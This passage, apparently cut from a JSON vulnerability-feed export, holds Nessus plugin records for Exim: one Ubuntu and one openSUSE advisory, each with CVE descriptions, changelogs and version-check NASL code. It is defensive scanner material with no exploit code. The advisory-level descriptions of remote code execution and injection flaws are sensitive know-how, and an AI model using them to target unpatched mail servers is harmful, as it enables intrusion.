receive_add_recipient via an e-mail\n message with fifty million recipients. NOTE: remote exploitation may be difficult because of resource\n consumption. (CVE-2020-28017)\n\n - Exim 4 before 4.92 allows Integer Overflow to Buffer Overflow, in which an unauthenticated remote attacker\n can execute arbitrary code by leveraging the mishandling of continuation lines during header-length\n restriction. (CVE-2020-28020)\n\n - Exim 4 before 4.94.2 has Improper Restriction of Write Operations within the Bounds of a Memory Buffer.\n This occurs when processing name=value pairs within MAIL FROM and RCPT TO commands. (CVE-2020-28022)\n\n - Exim 4 before 4.94.2 allows Buffer Underwrite that may result in unauthenticated remote attackers\n executing arbitrary commands, because smtp_ungetc was only intended to push back characters, but can\n actually push back non-character error codes such as EOF. (CVE-2020-28024)\n\n - Exim 4 before 4.94.2 allows Out-of-bounds Read because pdkim_finish_bodyhash does not validate the\n relationship between sig->bodyhash.len and b->bh.len; thus, a crafted DKIM-Signature header might lead to\n a leak of sensitive information from process memory. (CVE-2020-28025)\n\n - Exim 4 before 4.94.2 has Improper Neutralization of Line Delimiters, relevant in non-default\n configurations that enable Delivery Status Notification (DSN). Certain uses of ORCPT= can place a newline\n into a spool header file, and indirectly allow unauthenticated remote attackers to execute arbitrary\n commands as root. (CVE-2020-28026)\n\n - Exim 4 before 4.94.2 has Execution with Unnecessary Privileges. By leveraging a delete_pid_file race\n condition, a local user can delete arbitrary files as root. This involves the -oP and -oPX options.\n (CVE-2021-27216)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://ubuntu.com/security/notices/USN-4934-2\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-28026\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/05/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/05/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/05/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:exim4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:exim4-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:exim4-config\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:exim4-daemon-heavy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:exim4-daemon-light\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:exim4-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:eximon4\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_copyright(english:\"Ubuntu Security Notice (C) 2021-2023 Canonical, Inc. / NASL script (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('ubuntu.inc');\ninclude('misc_func.inc');\n\nif ( ! get_kb_item('Host/local_checks_enabled') ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/Ubuntu/release');\nif ( isnull(release) ) audit(AUDIT_OS_NOT, 'Ubuntu');\nrelease = chomp(release);\nif (! preg(pattern:\"^(16\\.04)$\", string:release)) audit(AUDIT_OS_NOT, 'Ubuntu 16.04', 'Ubuntu ' + release);\nif ( ! get_kb_item('Host/Debian/dpkg-l') ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\n\npkgs = [\n {'osver': '16.04', 'pkgname': 'exim4', 'pkgver': '4.86.2-2ubuntu2.6+esm1'},\n {'osver': '16.04', 'pkgname': 'exim4-base', 'pkgver': '4.86.2-2ubuntu2.6+esm1'},\n {'osver': '16.04', 'pkgname': 'exim4-config', 'pkgver': '4.86.2-2ubuntu2.6+esm1'},\n {'osver': '16.04', 'pkgname': 'exim4-daemon-heavy', 'pkgver': '4.86.2-2ubuntu2.6+esm1'},\n {'osver': '16.04', 'pkgname': 'exim4-daemon-light', 'pkgver': '4.86.2-2ubuntu2.6+esm1'},\n {'osver': '16.04', 'pkgname': 'exim4-dev', 'pkgver': '4.86.2-2ubuntu2.6+esm1'},\n {'osver': '16.04', 'pkgname': 'eximon4', 'pkgver': '4.86.2-2ubuntu2.6+esm1'}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n osver = NULL;\n pkgname = NULL;\n pkgver = NULL;\n if (!empty_or_null(package_array['osver'])) osver = package_array['osver'];\n if (!empty_or_null(package_array['pkgname'])) pkgname = package_array['pkgname'];\n if (!empty_or_null(package_array['pkgver'])) pkgver = package_array['pkgver'];\n if (osver && pkgname && pkgver) {\n if (ubuntu_check(osver:osver, pkgname:pkgname, pkgver:pkgver)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'exim4 / exim4-base / exim4-config / exim4-daemon-heavy / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:28:10", "description": "This update for exim fixes the following issues :\n\nExim was updated to exim-4.94.2\n\nsecurity update (boo#1185631)\n\n - CVE-2020-28007: Link attack in Exim's log directory\n\n - CVE-2020-28008: Assorted attacks in Exim's spool directory\n\n - CVE-2020-28014: Arbitrary PID file creation\n\n - CVE-2020-28011: Heap buffer overflow in queue_run()\n\n - CVE-2020-28010: Heap out-of-bounds write in main()\n\n - CVE-2020-28013: Heap buffer overflow in parse_fix_phrase()\n\n - CVE-2020-28016: Heap out-of-bounds write in parse_fix_phrase()\n\n - CVE-2020-28015: New-line injection into spool header file (local)\n\n - CVE-2020-28012: Missing close-on-exec flag for privileged pipe\n\n - CVE-2020-28009: Integer overflow in get_stdinput()\n\n - CVE-2020-28017: Integer overflow in receive_add_recipient()\n\n - CVE-2020-28020: Integer overflow in receive_msg()\n\n - CVE-2020-28023: Out-of-bounds read in smtp_setup_msg()\n\n - CVE-2020-28021: New-line injection into spool header file (remote)\n\n - CVE-2020-28022: Heap out-of-bounds read and write in extract_option()\n\n - CVE-2020-28026: Line truncation and injection in spool_read_header()\n\n - CVE-2020-28019: Failure to reset function pointer after BDAT error\n\n - CVE-2020-28024: Heap buffer underflow in smtp_ungetc()\n\n - CVE-2020-28018: Use-after-free in tls-openssl.c\n\n - CVE-2020-28025: Heap out-of-bounds read in pdkim_finish_bodyhash()\n\nupdate to exim-4.94.1\n\n - Fix security issue in BDAT state confusion. Ensure we reset known-good where we know we need to not be reading BDAT data, as a general case fix, and move the places where we switch to BDAT mode until after various protocol state checks. Fixes CVE-2020-BDATA reported by Qualys.\n\n - Fix security issue in SMTP verb option parsing (CVE-2020-EXOPT)\n\n - Fix security issue with too many recipients on a message (to remove a known security problem if someone does set recipients_max to unlimited, or if local additions add to the recipient list). Fixes CVE-2020-RCPTL reported by Qualys.\n\n - Fix CVE-2020-28016 (PFPZA): Heap out-of-bounds write in parse_fix_phrase()\n\n - Fix security issue CVE-2020-PFPSN and guard against cmdline invoker providing a particularly obnoxious sender full name.\n\n - Fix Linux security issue CVE-2020-SLCWD and guard against PATH_MAX better.\n\n - bring back missing exim_db.8 manual page (fixes boo#1173693)\n\n - bring in changes from current +fixes (lots of taint check fixes)\n\n - Bug 1329: Fix format of Maildir-format filenames to match other mail- related applications. Previously an 'H' was used where available info says that 'M' should be, so change to match.\n\n - Bug 2587: Fix pam expansion condition. Tainted values are commonly used as arguments, so an implementation trying to copy these into a local buffer was taking a taint-enforcement trap. Fix by using dynamically created buffers.\n\n - Bug 2586: Fix listcount expansion operator. Using tainted arguments is reasonable, eg. to count headers.\n Fix by using dynamically created buffers rather than a local. Do similar fixes for ACL actions 'dcc', 'log_reject_target', 'malware' and 'spam'; the arguments are expanded so could be handling tainted values.\n\n - Bug 2590: Fix -bi (newaliases). A previous code rearrangement had broken the (no-op) support for this sendmail command. Restore it to doing nothing, silently, and returning good status.\n\n - update to exim 4.94\n\n - some transports now refuse to use tainted data in constructing their delivery location this WILL BREAK configurations which are not updated accordingly. In particular: any Transport use of $local_user which has been relying upon check_local_user far away in the Router to make it safe, should be updated to replace $local_user with $local_part_data.\n\n - Attempting to remove, in router or transport, a header name that ends with an asterisk (which is a standards-legal name) will now result in all headers named starting with the string before the asterisk being removed.\n\n - switch pretrans to use lua (fixes boo#1171877)\n\n\n\n - bring changes from current in +fixes branch (patch-exim-fixes-ee83de04d3087efaf808d1f2235a988275c2ee 94)\n\n - fixes CVE-2020-12783 (boo#1171490)\n\n - Regard command-line recipients as tainted.\n\n - Bug 2489: Fix crash in the 'pam' expansion condition.\n\n - Use tainted buffers for the transport smtp context.\n\n - Bug 2493: Harden ARC verify against Outlook, which has been seen to mix the ordering of its ARC headers. This caused a crash.\n\n - Bug 2492: Use tainted memory for retry record when needed. Previously when a new record was being constructed with information from the peer, a trap was taken.\n\n - Bug 2494: Unset the default for dmarc_tld_file.\n\n - Fix an uninitialised flag in early-pipelining.\n Previously connections could, depending on the platform, hang at the STARTTLS response.\n\n - Bug 2498: Reset a counter used for ARC verify before handling another message on a connection. Previously if one message had ARC headers and the following one did not, a crash could result when adding an Authentication-Results: header.\n\n - Bug 2500: Rewind some of the common-coding in string handling between the Exim main code and Exim-related utities.\n\n - Fix the variables set by the gsasl authenticator.\n\n - Bug 2507: Modules: on handling a dynamic-module (lookups) open failure, only retrieve the errormessage once.\n\n - Bug 2501: Fix init call in the heimdal authenticator.\n Previously it adjusted the size of a major service buffer; this failed because the buffer was in use at the time. Change to a compile-time increase in the buffer size, when this authenticator is compiled into exim.\n\n - update to exim 4.93.0.4 (+fixes release)\n\n - Avoid costly startup code when not strictly needed. This reduces time for some exim process initialisations. It does mean that the logging of TLS configuration problems is only done for the daemon startup.\n\n - Early-pipelining support code is now included unless disabled in Makefile.\n\n - DKIM verification defaults no long accept sha1 hashes, to conform to RFC 8301. They can still be enabled, using the dkim_verify_hashes main option.\n\n - Support CHUNKING from an smtp transport using a transport_filter, when DKIM signing is being done.\n Previously a transport_filter would always disable CHUNKING, falling back to traditional DATA.\n\n - Regard command-line receipients as tainted.\n\n - Bug 340: Remove the daemon pid file on exit, whe due to SIGTERM.\n\n - Bug 2489: Fix crash in the 'pam' expansion condition. It seems that the PAM library frees one of the arguments given to it, despite the documentation. Therefore a plain malloc must be used.\n\n - Bug 2491: Use tainted buffers for the transport smtp context. Previously on-stack buffers were used, resulting in a taint trap when DSN information copied from a received message was written into the buffer.\n\n - Bug 2493: Harden ARC verify against Outlook, whick has been seen to mix the ordering of its ARC headers. This caused a crash.\n\n - Bug 2492: Use tainted memory for retry record when needed. Previously when a new record was being constructed with information from the peer, a trap was taken.\n\n - Bug 2494: Unset the default for dmarc_tld_file.\n Previously a naiive installation would get error messages from DMARC verify, when it hit the nonexistent file indicated by the default. Distros wanting DMARC enabled should both provide the file and set the option.\n Also enforce no DMARC verification for command-line sourced messages.\n\n - Fix an uninitialised flag in early-pipelining.\n Previously connections could, depending on the platform, hang at the STARTTLS response.\n\n - Bug 2498: Reset a counter used for ARC verify before handling another message on a connection. Previously if one message had ARC headers and the following one did not, a crash could result when adding an Authentication-Results: header.\n\n - Bug 2500: Rewind some of the common-coding in string handling between the Exim main code and Exim-related utities. The introduction of taint tracking also did many adjustments to string handling. Since then, eximon frequently terminated with an assert failure.\n\n - When PIPELINING, synch after every hundred or so RCPT commands sent and check for 452 responses. This slightly helps the inefficieny of doing a large alias-expansion into a recipient-limited target. The max_rcpt transport option still applies (and at the current default, will override the new feature). The check is done for either cause of synch, and forces a fast-retry of all 452'd recipients using a new MAIL FROM on the same connection.\n The new facility is not tunable at this time.\n\n - Fix the variables set by the gsasl authenticator.\n Previously a pointer to library live data was being used, so the results became garbage. Make copies while it is still usable.\n\n - Logging: when the deliver_time selector ise set, include the DT= field on delivery deferred (==) and failed (**) lines (if a delivery was attemtped). Previously it was only on completion (=>) lines.\n\n - Authentication: the gsasl driver not provides the $authN variables in time for the expansion of the server_scram_iter and server_scram_salt options.\n\nspec file cleanup to make update work\n\n - add docdir to spec\n\n - update to exim 4.93\n\n - SUPPORT_DMARC replaces EXPERIMENTAL_DMARC\n\n - DISABLE_TLS replaces SUPPORT_TLS\n\n - Bump the version for the local_scan API.\n\n - smtp transport option hosts_try_fastopen defaults to '*'.\n\n - DNSSec is requested (not required) for all queries.\n (This seemes to ask for trouble if your resolver is a systemd-resolved.)\n\n - Generic router option retry_use_local_part defaults to 'true' under specific pre-conditions.\n\n - Introduce a tainting mechanism for values read from untrusted sources.\n\n - Use longer file names for temporary spool files (this avoids name conflicts with spool on a shared file system).\n\n - Use dsn_from main config option (was ignored previously).\n\n - update to exim 4.92.3\n\n - CVE-2019-16928: fix against Heap-based buffer overflow in string_vformat, remote code execution seems to be possible\n\n - update to exim 4.92.2\n\n - CVE-2019-15846: fix against remote attackers executing arbitrary code as root via a trailing backslash\n\n - update to exim 4.92.1\n\n - CVE-2019-13917: Fixed an issue with $(sort) expansion which could allow remote attackers to execute other programs with root privileges (boo#1142207)\n\n - spec file cleanup\n\n - fix DANE inclusion guard condition\n\n - re-enable i18n and remove misleading comment\n\n - EXPERIMENTAL_SPF is now SUPPORT_SPF\n\n - DANE is now SUPPORT_DANE\n\n - update to exim 4.92\n\n - $(l_header:<name>) expansion\n\n - $(readsocket) now supports TLS\n\n - 'utf8_downconvert' option (if built with SUPPORT_I18N)\n\n - 'pipelining' log_selector\n\n - JSON variants for $(extract ) expansion\n\n - 'noutf8' debug option\n\n - TCP Fast Open support on MacOS\n\n - CVE-2019-10149: Fixed a Remote Command Execution (boo#1136587)\n\n - add workaround patch for compile time error on missing printf format annotation (gnu_printf.patch)\n\n - update to 4.91\n\n - DEFER rather than ERROR on redis cluster MOVED response.\n\n - Catch and remove uninitialized value warning in exiqsumm\n\n - Disallow '/' characters in queue names specified for the 'queue=' ACL modifier. This matches the restriction on the commandline.\n\n - Fix pgsql lookup for multiple result-tuples with a single column. Previously only the last row was returned.\n\n - Bug 2217: Tighten up the parsing of DKIM signature headers.\n\n - Bug 2215: Fix crash associated with dnsdb lookup done from DKIM ACL.\n\n - Fix issue with continued-connections when the DNS shifts unreliably.\n\n - Bug 2214: Fix SMTP responses resulting from non-accept result of MIME ACL.\n\n - The 'support for' informational output now, which built with Content Scanning support, has a line for the malware scanner interfaces compiled in. Interface can be individually included or not at build time.\n\n - The 'aveserver', 'kavdaemon' and 'mksd' interfaces are now not included by the template makefile 'src/EDITME'.\n The 'STREAM' support for an older ClamAV interface method is removed.\n\n - Bug 2223: Fix mysql lookup returns for the no-data case (when the number of rows affected is given instead).\n\n - The runtime Berkeley DB library version is now additionally output by 'exim -d -bV'. Previously only the compile-time version was shown.\n\n - Bug 2230: Fix cutthrough routing for nonfirst messages in an initiating SMTP connection.\n\n - Bug 2229: Fix cutthrough routing for nonstandard port numbers defined by routers.\n\n - Bug 2174: A timeout on connect for a callout was also erroneously seen as a timeout on read on a GnuTLS initiating connection, resulting in the initiating connection being dropped.\n\n - Relax results from ACL control request to enable cutthrough, in unsupported situations, from error to silently (except under debug) ignoring.\n\n - Fix Buffer overflow in base64d() (CVE-2018-6789)\n\n - Fix bug in DKIM verify: a buffer overflow could corrupt the malloc metadata, resulting in a crash in free().\n\n - Fix broken Heimdal GSSAPI authenticator integration.\n\n - Bug 2113: Fix conversation closedown with the Avast malware scanner.\n\n - Bug 2239: Enforce non-usability of control=utf8_downconvert in the mail ACL.\n\n - Speed up macro lookups during configuration file read, by skipping non- macro text after a replacement (previously it was only once per line) and by skipping builtin macros when searching for an uppercase lead character.\n\n - DANE support moved from Experimental to mainline. The Makefile control for the build is renamed.\n\n - Fix memory leak during multi-message connections using STARTTLS.\n\n - Bug 2236: When a DKIM verification result is overridden by ACL, DMARC reported the original. Fix to report (as far as possible) the ACL result replacing the original.\n\n - Fix memory leak during multi-message connections using STARTTLS under OpenSSL\n\n - Bug 2242: Fix exim_dbmbuild to permit directoryless filenames.\n\n - Fix utf8_downconvert propagation through a redirect router.\n\n - Bug 2253: For logging delivery lines under PRDR, append the overall DATA response info to the (existing) per-recipient response info for the 'C=' log element.\n\n - Bug 2251: Fix ldap lookups that return a single attribute having zero- length value.\n\n - Support Avast multiline protocol, this allows passing flags to newer versions of the scanner.\n\n - Ensure that variables possibly set during message acceptance are marked dead before release of memory in the daemon loop.\n\n - Bug 2250: Fix a longstanding bug in heavily-pipelined SMTP input (such as a multi-recipient message from a mailinglist manager).\n\n - The (EXPERIMENTAL_DMARC) variable $dmarc_ar_header is withdrawn, being replaced by the $(authresults ) expansion.\n\n - Bug 2257: Fix pipe transport to not use a socket-only syscall.\n\n - Set a handler for SIGTERM and call exit(3) if running as PID 1. This allows proper process termination in container environments.\n\n - Bug 2258: Fix spool_wireformat in combination with LMTP transport. Previously the 'final dot' had a newline after it; ensure it is CR,LF.\n\n - SPF: remove support for the 'spf' ACL condition outcome values 'err_temp' and 'err_perm', deprecated since 4.83 when the RFC-defined words ' temperror' and 'permerror' were introduced.\n\n - Re-introduce enforcement of no cutthrough delivery on transports having transport-filters or DKIM-signing.\n\n - Cutthrough: for a final-dot response timeout (and nonunderstood responses) in defer=pass mode supply a 450 to the initiator. Previously the message would be spooled.\n\n - DANE: add dane_require_tls_ciphers SMTP Transport option; if unset, tls_require_ciphers is used as before.\n\n - Malware Avast: Better match the Avast multiline protocol.\n\n - Fix reinitialisation of DKIM logging variable between messages.\n\n - Bug 2255: Revert the disable of the OpenSSL session caching.\n\n - Add util/renew-opendmarc-tlds.sh script for safe renewal of public suffix list.\n\n - DKIM: accept Ed25519 pubkeys in SubjectPublicKeyInfo-wrapped form, since the IETF WG has not yet settled on that versus the original 'bare' representation.\n\n - Fix syslog logging for syslog_timestamp=no and log_selector +millisec. Previously the millisecond value corrupted the output. Fix also for syslog_pid=no and log_selector +pid, for which the pid corrupted the output.\n\n - Replace xorg-x11-devel by individual pkgconfig() buildrequires. \n\n - update to 4.90.1\n\n - Allow PKG_CONFIG_PATH to be set in Local/Makefile and use it correctly during configuration. Wildcards are allowed and expanded.\n\n - Shorten the log line for daemon startup by collapsing adjacent sets of identical IP addresses on different listening ports. Will also affect 'exiwhat' output.\n\n - Tighten up the checking in isip4 (et al): dotted-quad components larger than 255 are no longer allowed.\n\n - Default openssl_options to include +no_ticket, to reduce load on peers. Disable the session-cache too, which might reduce our load. Since we currrectly use a new context for every connection, both as server and client, there is no benefit for these.\n\n - Add $SOURCE_DATE_EPOCH support for reproducible builds, per spec at <https://reproducible-builds.org/specs/source-date-epoch />.\n\n - Fix smtp transport use of limited max_rcpt under mua_wrapper. Previously the check for any unsuccessful recipients did not notice the limit, and erroneously found still-pending ones.\n\n - Pipeline CHUNKING command and data together, on kernels that support MSG_MORE. Only in-clear (not on TLS connections).\n\n - Avoid using a temporary file during transport using dkim. Unless a transport-filter is involved we can buffer the headers in memory for creating the signature, and read the spool data file once for the signature and again for transmission.\n\n - Enable use of sendfile in Linux builds as default. It was disabled in 4.77 as the kernel support then wasn't solid, having issues in 64bit mode. Now, it's been long enough. Add support for FreeBSD also.\n\n - Add commandline_checks_require_admin option.\n\n - Do pipelining under TLS.\n\n - For the 'sock' variant of the malware scanner interface, accept an empty cmdline element to get the documented default one. Previously it was inaccessible.\n\n - Prevent repeated use of -p/-oMr\n\n - DKIM: enforce the DNS pubkey record 'h' permitted-hashes optional field, if present.\n\n - DKIM: when a message has multiple signatures matching an identity given in dkim_verify_signers, run the dkim acl once for each.\n\n - Support IDNA2008.\n\n - The path option on a pipe transport is now expanded before use\n\n - Have the EHLO response advertise VRFY, if there is a vrfy ACL defined.\n\n - Several bug fixes\n\n - Fix for buffer overflow in base64decode() (boo#1079832 CVE-2018-6789)", "cvss3": {}, "published": "2021-05-18T00:00:00", "type": "nessus", "title": "openSUSE Security Update : exim (openSUSE-2021-677) (Stack Clash)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000369", "CVE-2017-16943", "CVE-2017-16944", "CVE-2018-6789", "CVE-2019-10149", "CVE-2019-13917", "CVE-2019-15846", "CVE-2019-16928", "CVE-2020-12783", "CVE-2020-28007", "CVE-2020-28008", "CVE-2020-28009", "CVE-2020-28010", "CVE-2020-28011", "CVE-2020-28012", "CVE-2020-28013", "CVE-2020-28014", "CVE-2020-28015", "CVE-2020-28016", "CVE-2020-28017", "CVE-2020-28018", "CVE-2020-28019", "CVE-2020-28020", "CVE-2020-28021", "CVE-2020-28022", "CVE-2020-28023", "CVE-2020-28024", "CVE-2020-28025", "CVE-2020-28026"], "modified": "2023-04-25T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:exim", "p-cpe:/a:novell:opensuse:exim-debuginfo", "p-cpe:/a:novell:opensuse:exim-debugsource", "p-cpe:/a:novell:opensuse:eximon", "p-cpe:/a:novell:opensuse:eximon-debuginfo", "p-cpe:/a:novell:opensuse:eximstats-html", "cpe:/o:novell:opensuse:15.2"], "id": "OPENSUSE-2021-677.NASL", "href": "https://www.tenable.com/plugins/nessus/149614", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2021-677.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(149614);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\n \"CVE-2017-1000369\",\n \"CVE-2017-16943\",\n \"CVE-2017-16944\",\n \"CVE-2018-6789\",\n \"CVE-2019-10149\",\n \"CVE-2019-13917\",\n \"CVE-2019-15846\",\n \"CVE-2019-16928\",\n \"CVE-2020-12783\",\n \"CVE-2020-28007\",\n \"CVE-2020-28008\",\n \"CVE-2020-28009\",\n \"CVE-2020-28010\",\n \"CVE-2020-28011\",\n \"CVE-2020-28012\",\n \"CVE-2020-28013\",\n \"CVE-2020-28014\",\n \"CVE-2020-28015\",\n \"CVE-2020-28016\",\n \"CVE-2020-28017\",\n \"CVE-2020-28018\",\n \"CVE-2020-28019\",\n \"CVE-2020-28020\",\n \"CVE-2020-28021\",\n \"CVE-2020-28022\",\n \"CVE-2020-28023\",\n \"CVE-2020-28024\",\n \"CVE-2020-28025\",\n \"CVE-2020-28026\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/10\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/17\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0129\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0413\");\n\n script_name(english:\"openSUSE Security Update : exim (openSUSE-2021-677) (Stack Clash)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for exim fixes the following issues :\n\nExim was updated to exim-4.94.2\n\nsecurity update (boo#1185631)\n\n - CVE-2020-28007: Link attack in Exim's log directory\n\n - CVE-2020-28008: Assorted attacks in Exim's spool\n directory\n\n - CVE-2020-28014: Arbitrary PID file creation\n\n - CVE-2020-28011: Heap buffer overflow in queue_run()\n\n - CVE-2020-28010: Heap out-of-bounds write in main()\n\n - CVE-2020-28013: Heap buffer overflow in\n parse_fix_phrase()\n\n - CVE-2020-28016: Heap out-of-bounds write in\n parse_fix_phrase()\n\n - CVE-2020-28015: New-line injection into spool header\n file (local)\n\n - CVE-2020-28012: Missing close-on-exec flag for\n privileged pipe\n\n - CVE-2020-28009: Integer overflow in get_stdinput()\n\n - CVE-2020-28017: Integer overflow in\n receive_add_recipient()\n\n - CVE-2020-28020: Integer overflow in receive_msg()\n\n - CVE-2020-28023: Out-of-bounds read in smtp_setup_msg()\n\n - CVE-2020-28021: New-line injection into spool header\n file (remote)\n\n - CVE-2020-28022: Heap out-of-bounds read and write in\n extract_option()\n\n - CVE-2020-28026: Line truncation and injection in\n spool_read_header()\n\n - CVE-2020-28019: Failure to reset function pointer after\n BDAT error\n\n - CVE-2020-28024: Heap buffer underflow in smtp_ungetc()\n\n - CVE-2020-28018: Use-after-free in tls-openssl.c\n\n - CVE-2020-28025: Heap out-of-bounds read in\n pdkim_finish_bodyhash()\n\nupdate to exim-4.94.1\n\n - Fix security issue in BDAT state confusion. Ensure we\n reset known-good where we know we need to not be reading\n BDAT data, as a general case fix, and move the places\n where we switch to BDAT mode until after various\n protocol state checks. Fixes CVE-2020-BDATA reported by\n Qualys.\n\n - Fix security issue in SMTP verb option parsing\n (CVE-2020-EXOPT)\n\n - Fix security issue with too many recipients on a message\n (to remove a known security problem if someone does set\n recipients_max to unlimited, or if local additions add\n to the recipient list). Fixes CVE-2020-RCPTL reported by\n Qualys.\n\n - Fix CVE-2020-28016 (PFPZA): Heap out-of-bounds write in\n parse_fix_phrase()\n\n - Fix security issue CVE-2020-PFPSN and guard against\n cmdline invoker providing a particularly obnoxious\n sender full name.\n\n - Fix Linux security issue CVE-2020-SLCWD and guard\n against PATH_MAX better.\n\n - bring back missing exim_db.8 manual page (fixes\n boo#1173693)\n\n - bring in changes from current +fixes (lots of taint\n check fixes)\n\n - Bug 1329: Fix format of Maildir-format filenames to\n match other mail- related applications. Previously an\n 'H' was used where available info says that 'M' should\n be, so change to match.\n\n - Bug 2587: Fix pam expansion condition. Tainted values\n are commonly used as arguments, so an implementation\n trying to copy these into a local buffer was taking a\n taint-enforcement trap. Fix by using dynamically created\n buffers.\n\n - Bug 2586: Fix listcount expansion operator. Using\n tainted arguments is reasonable, eg. to count headers.\n Fix by using dynamically created buffers rather than a\n local. Do similar fixes for ACL actions 'dcc',\n 'log_reject_target', 'malware' and 'spam'; the arguments\n are expanded so could be handling tainted values.\n\n - Bug 2590: Fix -bi (newaliases). A previous code\n rearrangement had broken the (no-op) support for this\n sendmail command. Restore it to doing nothing, silently,\n and returning good status.\n\n - update to exim 4.94\n\n - some transports now refuse to use tainted data in\n constructing their delivery location this WILL BREAK\n configurations which are not updated accordingly. In\n particular: any Transport use of $local_user which has\n been relying upon check_local_user far away in the\n Router to make it safe, should be updated to replace\n $local_user with $local_part_data.\n\n - Attempting to remove, in router or transport, a header\n name that ends with an asterisk (which is a\n standards-legal name) will now result in all headers\n named starting with the string before the asterisk being\n removed.\n\n - switch pretrans to use lua (fixes boo#1171877)\n\n\n\n - bring changes from current in +fixes branch\n (patch-exim-fixes-ee83de04d3087efaf808d1f2235a988275c2ee\n 94)\n\n - fixes CVE-2020-12783 (boo#1171490)\n\n - Regard command-line recipients as tainted.\n\n - Bug 2489: Fix crash in the 'pam' expansion condition.\n\n - Use tainted buffers for the transport smtp context.\n\n - Bug 2493: Harden ARC verify against Outlook, which has\n been seen to mix the ordering of its ARC headers. This\n caused a crash.\n\n - Bug 2492: Use tainted memory for retry record when\n needed. Previously when a new record was being\n constructed with information from the peer, a trap was\n taken.\n\n - Bug 2494: Unset the default for dmarc_tld_file.\n\n - Fix an uninitialised flag in early-pipelining.\n Previously connections could, depending on the platform,\n hang at the STARTTLS response.\n\n - Bug 2498: Reset a counter used for ARC verify before\n handling another message on a connection. Previously if\n one message had ARC headers and the following one did\n not, a crash could result when adding an\n Authentication-Results: header.\n\n - Bug 2500: Rewind some of the common-coding in string\n handling between the Exim main code and Exim-related\n utities.\n\n - Fix the variables set by the gsasl authenticator.\n\n - Bug 2507: Modules: on handling a dynamic-module\n (lookups) open failure, only retrieve the errormessage\n once.\n\n - Bug 2501: Fix init call in the heimdal authenticator.\n Previously it adjusted the size of a major service\n buffer; this failed because the buffer was in use at the\n time. Change to a compile-time increase in the buffer\n size, when this authenticator is compiled into exim.\n\n - update to exim 4.93.0.4 (+fixes release)\n\n - Avoid costly startup code when not strictly needed. This\n reduces time for some exim process initialisations. It\n does mean that the logging of TLS configuration problems\n is only done for the daemon 